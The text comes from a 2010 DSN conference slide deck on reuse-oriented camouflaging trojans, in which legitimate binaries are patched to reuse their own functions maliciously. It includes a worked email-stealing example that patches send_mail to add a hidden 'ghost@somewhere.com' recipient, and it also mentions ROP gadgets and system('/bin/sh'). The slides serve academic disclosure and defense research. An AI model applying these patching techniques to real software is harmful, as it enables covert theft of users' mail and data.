The 40th Annual IEEE/IFIP International Conference on Dependable Systems and Networks Reuse-Oriented Camouflaging Trojan: Vulnerability Detection and Attack Construction Zhiqiang Lin Xiangyu Zhang, Dongyan Xu Purdue University July 1st, 2010
Background: reuse-oriented attack Return-into-libc attack Library call Return-oriented-programming [Shacham, CCS’07] Gadget (Short instruction sequences) Coarse-grained reuse from legal binary Legal Functions system("/bin/sh") Gadget (in libc): pop eax pop ebx ret
Feasibility Binary is everywhere Legal binaries contain the functional features for malicious purposes.
Feasibility (cont.) Incentive motivation to launch such attack No environment setup No stand-alone code to implement the malicious semantics Reuse Oriented Camouflaging (ROC) Trojan
Feasibility (cont.) vxheaven.org (260K malware pieces)
How the top 100 malware in 2008 infects computers Feasibility (cont.) Distribute? How the top 100 malware in 2008 infects computers
How to launch the ROC attack Step-I: attacker has a goal and gets a victim binary Step-II: attacker wishes to reuse some function f(x) to achieve his malicious goal Where is f Does f have side effect Where is x, how to access x Step-III: attacker patches f(x) ROC Trojan Step-IV: attacker distributes ROC trojans Reuse of F(x): Patching argument x: { F(x) } { F(y) } Duplication: { F(x) } { F(x), F(y) } Feature extraction send(“alice”) send(“alice,bob”) Side effect analysis Argument reverse engineering send(“alice”, ”normal email”) send(“alice”, ”normal email”), send(“alice”, ”spam email”)
A driving example Victim binary Attack goal Cheating sheet 1 struct Email_ADDRESS { 2 char *name; 3 char *domain; 4 Email_ADDRESS * next; 5 }; 6 Email_ADDRESS sender_addr; 7 8 void main () { 9 struct { 10 Email_ADDRESS * to; 11 Email_ADDRESS * from; 12 } header; 13 char body[BODY_SIZE]; 14 15 readconfig(&sender_addr); 16 if (use_default) header.from=&sender_addr 18 19 editor (&header, body); 20 send_mail (&header, body); 21 } Victim binary Attack goal Get an email copy whenever people uses it send email Cheating sheet Patching the next field in Email_ADDRESS of field to in argument header In the following of my talk, I will use a simplified email client software, to illustrate how we analyze the binary and launch our attack. At a high level, this email client has the following code. First of all, it declares a ADDRESS type, which is a link list. Then it has a main function, which first declares a header type data structure, and message body char array. Then it invokes readconfig function to fill the global variable myaddr, Invokes function editor, and finally send email. Our analysis will show there could be an email redirection attack, if we patch function send_mail. So how we reach this analysis. Actually, we have three key techniques. They are Feature extraction Side effect analysis Argument reverse engineering
I. Feature extraction Goal Dynamic analysis Track Get reusable functions f Dynamic analysis Track Call graph (CG) Data usage Data-Definition Data-Use Data-Propagation Input & Output Annotate CG with data used in the function 1 struct Email_ADDRESS { 2 char *name; 3 char *domain; 4 Email_ADDRESS * next; 5 }; 6 Email_ADDRESS sender_addr; 7 8 void main () { 9 struct { 10 Email_ADDRESS * to; 11 Email_ADDRESS * from; 12 } header; 13 char body[BODY_SIZE]; 14 15 readconfig(&sender_addr); 16 if (use_default) header.from=&sender_addr 18 19 editor (&header, body); 20 send_mail (&header, body); 21 }
I. Feature extraction a c d b e f g i h j k main editor read_config 1 struct Email_ADDRESS { 2 char *name; 3 char *domain; 4 Email_ADDRESS * next; 5 }; 6 Email_ADDRESS sender_addr; 7 8 void main () { 9 struct { 10 Email_ADDRESS * to; 11 Email_ADDRESS * from; 12 } header; 13 char body[BODY_SIZE]; 14 15 readconfig(&sender_addr); 16 if (use_default) header.from=&sender_addr 18 19 editor (&header, body); 20 send_mail (&header, body); 21 } editor read_config send_mail alice@bob.com c bob@bob.com Hello\r\n d b smtp_ehlo smtp_mail EHLO [10.0.0.4]\r\n e f g smtp_open i alice@bob.com h X-X-Sender: alice@bob.com\r\n To: bob@bob.com\r\n Hello\r\n MAIL FROM:<alice@bob.com>\r\n RCPT TO:<bob@bob.com>\r\n bob@bob.com Hello\r\n j EHLO [10.0.0.4]\r\n MAIL FROM:<alice@bob.com>\r\n RCPT TO:<bob@bob.com>\r\n X-X-Sender: alice@bob.com\r\n To: bob@alice.com\r\n Hello\r\n smtp_send k sys_write
I. Feature extraction – candidate function main A function instance f is candidate function f it is the common ancestor of all the function instances which use/define the observed data. editor read_config send_mail alice@bob.com c c bob@bob.com Hello\r\n d b smtp_ehlo smtp_mail EHLO [10.0.0.4]\r\n e f g smtp_open i h X-X-Sender: alice@bob.com\r\n To: bob@bob.com\r\n Hello\r\n MAIL FROM:<alice@bob.com>\r\n RCPT TO:< bob@bob.com >\r\n j EHLO [10.0.0.4]\r\n MAIL FROM:<alice@bob.com>\r\n RCPT TO:< bob@bob.com >\r\n X-X-Sender: alice@bob.com\r\n To: bob@alice.com\r\n Hello\r\n smtp_send k sys_write
II. Side effect analysis What A memory write in a function instance that is used after the function returns Why Only performed if we want to duplicate a function call, f(x), f(y) How Tracking memory write Heap variables Global variables Stack variables a a main editor read_config send_mail alice@bob.com c c bob@bob.com Hello\r\n d b smtp_ehlo smtp_mail EHLO [10.0.0.4]\r\n e f g smtp_open i h X-X-Sender: alice@bob.com\r\n To: bob@bob.com \r\n Hello\r\n MAIL FROM:<alice@bob.com>\r\n RCPT TO:< bob@bob.com >\r\n j EHLO [10.0.0.4]\r\n MAIL FROM:<alice@bob.com>\r\n RCPT TO:< bob@bob.com >\r\n X-X-Sender: alice@bob.com\r\n To: bob@alice.com\r\n Hello\r\n smtp_send k sys_write
III. Argument reverse engineering Now we have identified the candidate function f to patch, but How to pass the malicious arguments to f “Which argument x should be patched" “How to access x, without symbolic information “ Reference Graph A reference graph is a graph with nodes being the set of memory regions, and edges being the set of points-to relations Memory regions Points-to edges
III. Argument reverse engineering Mem snapshot send_mail Reference Graph Memory Differencing 0:arg0 bfff9960 (ESP) 4:arg1 bfffcf48 bfffcf12 4 From: <alice@bob.com> To: bob@bob.com Hello Hello 851bec0 8505c90 8 8 4 4 85075d8 851bf00 84c4d08 84c4d18 alice bob.com bob bob.com
III. Argument reverse engineering Mem snapshot bfff9960 (ESP) bfffcf48 bfffcf12 Hello 851bec0 8 85075d8 851bf00 4 alice bob.com 8505c90 84c4d08 84c4d18 bob send_mail Reference Graph Memory Differencing 0:arg0 4:arg1 Reference Path From: <alice@bob.com> To: bob@bob.com Hello Mem snapshot2 (*(*(ESP+0)+0)+8) bfff9970 (ESP) bfffcf58 bfffcf22 4 Hello 8521ec0 8 85075e8 851bf40 alice bob.com 8521c90 84c5c12 84c5d10 bob send_mail 8505b80 84c4500 84c4512 bob1 bob1.com From: <alice@bob.com> To: bob@bob.com, bob1@bob1.com Hello Patching the next field (+8) in Email_ADDRESS of field to (+0) in argument header (+0)
Put it all together Binary Patching Dynamic Analysis Candidate Functions f Side Effect Analysis Vulnerable Functions f Binary Patching ③ ② ② ① ① 0101010000 (app. binary) ③ ④ Attack Goal Feature Extraction ROC Attack Composer 1101010010 The final trojan Dynamic Analysis ② ② ③ Candidate Functions f Argument Reverse Eng. Reference Path x ROC: Reuse-Oriented Camouflaging
Implementation Dynamic analysis Binary patching Dynamic binary instrumentation Track memory reads (use), writes (definition), and data dependency, input/output, heap allocations, de-allocations, and call stack contexts, caller-callee relations (call graph) Trace file Take snapshots of memory Offline analysis on the traces file Binary patching Binary rewriting/patching Leveraged widely used virus embedding technique
Implementation (cont.) Binary rewriting Helper Function Method Description BEFORE(int func) {code} insert the code block before func AFTER(int func) {code} insert the code block after func ENTRY(int func) {code} insert right inside func void get(int* field) retrieve the argument field void set(int* field, void* val) set the argument with val void duplicate(int func) duplicate the invocation of func BEFORE(send_mail){ set(&next_receipt, “ghost@somewhere.com"); } Safe Reference Path: (*(*(ESP+0)+0)+8)
Evaluation Benchmark Binary Size Attack Pine-4.63 6.3M Email Stealing/Spamming Mailx-12.4 712K Mutella-0.4.5 843K Introducing Covert C&C channel Peercast-0.1217 58K Gift-0.11.81 (libGnutella.so.0.11) 321K 657K File transferring
Discussion Achilles' heel of ROC Break the software modularity Binary integrity check Tripwire [Kim and Spafford, CCS’94] Up-to-date, globally consistent hash values Frequent, automatic software patching, decentralized distribution Break the software modularity Violate “software development principle” Seemingly Easy defense: killer heeling
Related work F(x) F(y) F(x) F(x) Binary reuse in malware analysis BCR [Caballero et al, NDSS’10] Inspector gadget [Kolbitsch et al, Oakland’10] Difference F(x) F(y) \ F(x) F(x)
Summary ROC trojan An analysis framework Dynamic binary analysis Feature extraction Side effect analysis Argument reverse engineering Binary patching Such attack is real, and can be constructed in a systematic way. However, defender can similarly detect ROC vulnerabilities in binaries
{zlin, xyzhang, dxu}@cs.purdue.edu Q & A Thank you For more information: {zlin, xyzhang, dxu}@cs.purdue.edu